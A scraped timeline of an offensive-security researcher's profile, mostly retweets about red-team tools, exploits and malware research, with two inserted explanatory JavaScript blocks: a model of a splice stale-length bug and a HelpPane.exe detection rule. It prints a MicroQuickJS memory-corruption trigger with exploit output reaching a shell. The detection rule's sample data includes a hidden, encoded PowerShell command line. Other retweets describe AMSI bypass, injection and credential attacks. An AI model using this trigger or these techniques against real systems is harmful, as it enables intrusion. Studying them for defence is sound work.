Offensive research dude. Occasional CTF player (looking for a team!)

Joined July 2016
sinusoid retweeted
I'm pleased to announce @HyperDbg v0.19. This release introduces a new module, HyperTrace, which brings hypervisor-level integration w/ tracing technologies such as Last Branch Record (LBR) & Processor Trace (PT). LBR is now available, with more coming. github.com/HyperDbg/HyperDbg…
sinusoid retweeted
We think of WASM as a mechanism to run compiled code in your browser, but what if we shimmed in all the host APIs necessary to run full implants with ALL logic entirely in the WASM VM? This post walks through what that looks like. praetorian.com/blog/wasmforg… #wasm #malware #sliver
sinusoid retweeted
In macOS Tahoe 26.4 Apple added a new security feature to Terminal that warns users of potentially malicious pastes with a "Possible malware, Paste blocked" prompt. Here's how it actually works 🧵
sinusoid retweeted
New blog: Using LLMs the right way for malware analysis 💡Tips for building an autonomous AI analysis lab on a 12 yo laptop and getting stuff done faster without loss of accuracy. blog.gdatasoftware.com/2026/…
DEMOSCENE > all.
17 Dec 2025
Realtime code, handmade ascii animations and raw tracker music. The demo ’CMOS Cosmos’ by Razor 1911 in 2025 #demoscene #ascii #msdos
sinusoid retweeted
Replying to @Defte_
Update: Thanks to @RedTeamPT, I created a pull request for ntlmrelayx to reflect the new requirements: github.com/fortra/impacket/p… Now Shadow Creds are working again 😀
sinusoid retweeted
Jan 26
I've tried something new! I have streamed some unfiltered coding, writing a module to detect malicious bytes in a shellcode injection scenario for an EDR that would use the System Call Integrity Layer project: youtube.com/watch?v=gK4OXh6l… If this content is useful, or you like it, please let me know and give me some ideas what you would want to see! I want to grow in myself and help produce content that would be beneficial for our amazing cyber community! #blueteam #cybersecurity #redteam #driver #rust #rustlang #infosec #rustdriver #soc #cyber #cti #informationsecurity #infosec
sinusoid retweeted
Jan 12
When MicroQuickJS was released, I spent 8.5 hours to summon an Exploit for it. Here is the Fault:

var arr = new Array(30)
var attack = {
  valueOf: function() {
    arr.length = 0
    arr.length = 3
    return 10
  }
}
arr.splice(attack, 30)

I document the full Ritual Process below
24 Dec 2025
New JS engine, old JS vulns :) Found a bug and wrote an exploit in 8 hours

645da364a8089c43953b345d3004fc76148cb2f136f74e211429ddc8452846d1  exp-shell.js
./mqjs ./exp-shell.js
LEAKED: 77b6 1c5ff205
LIBC BASE: 77b6 1d600000
STACK PTR: 7ffd 143e1bb8
WROTE ROP CHAIN
$ whoami
nyan
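The bug pattern in the tweet above is argument coercion that re-enters user code. Array.prototype.splice has to convert its start argument with ToIntegerOrInfinity, and that conversion calls attack.valueOf(), which shrinks the array before the engine has finished using the length it already read. The snippet below is an added illustration, not the original exploit and not MicroQuickJS code: naiveSplice models an engine that caches the length before coercing its arguments and then trusts the stale value, while runSpec shows what a spec-conformant engine (Node/V8 here) does with the very same trigger. In JS the stale reads only yield undefined; in a C engine whose backing store really was reallocated to 3 slots, reading slot 29 is a heap out-of-bounds access.

```javascript
// Added example: stale-length re-entrancy during splice argument coercion.
// Not code from the tweet or from MicroQuickJS; names below are illustrative.

// Naive "engine" splice: reads the length BEFORE coercing start/deleteCount and
// keeps using that value afterwards. Returns what it believes it deleted, the
// highest index it touched, and the array's real length at read time.
function naiveSplice(arr, start, deleteCount) {
  const len = arr.length;                // 30 here, stale after the next line
  const s = Math.trunc(Number(start));   // runs start.valueOf(): arr shrinks to 3
  const dc = Math.trunc(Number(deleteCount));
  const removed = [];
  let maxIndexRead = -1;
  for (let i = s; i < Math.min(s + dc, len); i++) { // bound uses the cached len
    removed.push(arr[i]);                // i = 10..29 while arr.length is 3
    maxIndexRead = i;
  }
  return { removed, maxIndexRead, lengthAtRead: arr.length };
}

// Same trigger as the tweet (filled with 0 so real elements and stale reads
// are distinguishable): valueOf frees/re-grows the array, then returns 10.
function makeTrigger() {
  const arr = new Array(30).fill(0);
  const attack = {
    valueOf() {
      arr.length = 0;   // in a native engine: backing store freed/reallocated
      arr.length = 3;
      return 10;
    },
  };
  return { arr, attack };
}

function runNaive() {
  const { arr, attack } = makeTrigger();
  return naiveSplice(arr, attack, 30);
}

// Spec-conformant engine: len (30) is read once, actualStart=10,
// actualDeleteCount=min(30, 30-10)=20, but every element access goes through
// HasProperty/Get on the *current* object, so nothing is read out of bounds;
// the result is a 20-slot array of holes and arr.length is set to 10.
function runSpec() {
  const { arr, attack } = makeTrigger();
  const removed = arr.splice(attack, 30);
  return { removed, lengthAfter: arr.length, holes: Object.keys(removed).length === 0 };
}

console.log('naive :', runNaive());
console.log('spec  :', runSpec());
```

The fix an engine needs is the one the spec already encodes: never index the backing store with a length computed before any call that can run script (valueOf, toString, getters, Proxy traps), or re-validate the length after every such call.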
sinusoid retweeted
i made a browser extension
sinusoid retweeted
Let's play peekaboo with PatchGuard! Read our blog post about hiding processes on modern Windows systems with HVCI enabled: outflank.nl/blog/2026/01/07/…
sinusoid retweeted
🔥Introducing a new Red Team tool - SessionHop: github.com/3lp4tr0n/SessionH… SessionHop utilizes the IHxHelpPaneServer COM object to hijack specified user sessions. This session hijacking technique is an alternative to remote process injection or dumping LSASS. Kudos to @tiraniddo for first discovering this years ago. Blue Team tip: Look for unusual child processes spawning from HelpPane.exe
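The blue-team tip in the tweet above, turned into a concrete rule, as an added example that is not part of SessionHop or the tweet: flag process-creation events whose parent image is HelpPane.exe and whose child is not on an allow list. The events are constructed by hand in a Sysmon Event ID 1-like Key=Value layout; the field names (UtcTime, Image, ParentImage, User, CommandLine) and the empty default allow list are assumptions, so map them to what your EDR or SIEM actually emits and baseline before adding known-good children.

```javascript
// Added example: detecting children of HelpPane.exe in process-creation
// telemetry. Not code from SessionHop; field names are assumptions.

// Constructed sample events (Sysmon EID 1-like layout, one event per line).
const SAMPLE_EVENTS = [
  // HelpPane.exe launching cmd.exe: the pattern the tweet tells defenders to hunt
  'UtcTime=2026-01-10T09:12:31Z Image=C:\\Windows\\System32\\cmd.exe ParentImage=C:\\Windows\\HelpPane.exe User=CORP\\alice CommandLine="cmd.exe /c whoami"',
  // Benign baseline: Explorer launching Notepad
  'UtcTime=2026-01-10T09:12:40Z Image=C:\\Windows\\System32\\notepad.exe ParentImage=C:\\Windows\\explorer.exe User=CORP\\alice CommandLine="notepad.exe"',
  // Same parent with different casing, PowerShell child
  'UtcTime=2026-01-10T09:13:02Z Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe ParentImage=c:\\windows\\helppane.exe User=CORP\\bob CommandLine="powershell.exe -nop -w hidden -enc AAAA"',
];

// Parse one 'Key=Value Key2="quoted value"' line into an object.
function parseEvent(line) {
  const ev = {};
  const re = /(\w+)=("([^"]*)"|\S+)/g;
  let m;
  while ((m = re.exec(line)) !== null) {
    ev[m[1]] = m[3] !== undefined ? m[3] : m[2];
  }
  return ev;
}

// Basename of a Windows path, lower-cased so casing tricks do not evade the rule.
function baseName(p) {
  return (p || '').split(/[\\/]/).pop().toLowerCase();
}

// Rule: parent is HelpPane.exe and the child is not explicitly allowed.
// allowedChildren defaults to empty (assumption: HelpPane.exe has no business
// spawning anything in your environment); extend it only from a baseline.
function isSuspiciousHelpPaneChild(ev, allowedChildren = []) {
  if (baseName(ev.ParentImage) !== 'helppane.exe') return false;
  const allowed = allowedChildren.map((s) => s.toLowerCase());
  return !allowed.includes(baseName(ev.Image));
}

// Run the rule over raw lines and return the hits with a short reason.
function detect(lines, allowedChildren = []) {
  return lines
    .map(parseEvent)
    .filter((ev) => isSuspiciousHelpPaneChild(ev, allowedChildren))
    .map((ev) => ({
      time: ev.UtcTime,
      user: ev.User,
      child: baseName(ev.Image),
      commandLine: ev.CommandLine,
      reason: `HelpPane.exe spawned ${baseName(ev.Image)}: possible IHxHelpPaneServer session hijack`,
    }));
}

for (const hit of detect(SAMPLE_EVENTS)) console.log(JSON.stringify(hit));
```

Because the technique runs the child inside the hijacked user's session, the interesting hits are the ones where the event's user is not the account an operator would expect to be interactive on that host at that time; correlate the hit with logon session data before closing it as benign.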
sinusoid retweeted
22 Dec 2025
Reusing part of the ESC1-unPAC BOF code to create a ShadowCreds unPAC BOF
1. Write msDS-KeyCredentialLink attribute using obfuscated LDAP queries.
2. Authenticate to the KDC using PKINIT.
3. unPAC-the-hash.
4. Cleanup msDS-KeyCredentialLink.
github.com/RayRRT/BOFs/tree/…
sinusoid retweeted
ProfileHound is a post-escalation tool to help find and achieve red-teaming objectives by locating domain user profiles on machines. It uses the BloodHound OpenGraph format to build a new edge called which determines if a user profile exists on a computer. This edge allows operators to make informed decisions about which computers to target for looting secrets. github.com/m4lwhere/profileh…
sinusoid retweeted
I've merged the first PR of 2026 for Wyrm, v0.7.2! This brings:
- Spawn via Early Cascade Injection.
- 'Wyrm Object Files (WOFs)' which allows the operator to extend the agent's capability via C/C++/Rust/(probably even Zig) - currently only at compile time. Runtime WOFs will be released in due course.
- The inject command for injecting Wyrm into another process.
- AMSI bypass uses VEH^2 over amsi.dll patching. Perhaps I can split this out into a profile to allow the operator to choose which method they would like.
- Reflective DLL inherits ETW patching from your profile.toml.
- C2 stability fixes.
Thanks everyone for your support in 2025, let's make 2026 the year of the dragon 🐉 github.com/0xflux/Wyrm #redteam #blueteam #wyrm #pentesting #cyber #infosec #maldev #cybersecurity #pentest #tools #rust #rustlang
sinusoid retweeted
Using ADCS to Attack HTTPS-Enabled WSUS Clients: @cookieTheft and I have extended the research by @Coontzy1 on WSUS attacks and explored how to leverage misconfigured ADCS templates to gain code execution on HTTPS-enabled WSUS clients. 1/2🧵
sinusoid retweeted
I'm excited to finally share Chronomaly, a kernel exploit for Android and Linux kernels 5.10.x using CVE-2025-38352. As a reminder, please patch your Android devices if you haven't already! I recommend getting some 🍿 before reading this post 👀 All links in the thread below:
sinusoid retweeted
27 Dec 2025
I HATE EXPLOIT DEVELOPMENT I HATE EXPLOIT DEVELOPMENT I HATE EXPLOIT DEVELOPMENT I HATE EXPLOIT DEVELOPMENT I HATE EXPLOIT DEVELOPMENT I HATE EXPLOIT DEVELOPMENT OMG ! IT WORKS, ZERO DAY I LOVE EXPLOIT DEVELOPMENT I LOVE EXPLOIT DEVELOPMENT I LOVE EXPLOIT DEVELOPMENT
I HATE PROGRAMMING I HATE PROGRAMMING I HATE PROGRAMMING I HATE PROGRAMMING I HATE PROGRAMMING I HATE PROGRAMMING I HATE PROGRAMMING YES! IT WORKS! I LOVE PROGRAMMING I LOVE PROGRAMMING I LOVE PROGRAMMING
sinusoid retweeted
I got interviewed on CTF Radiooo! youtu.be/v22IRBJWBQkn. Big thanks to hosts @adamdoupe and @Zardus for the opportunity & the fun chat!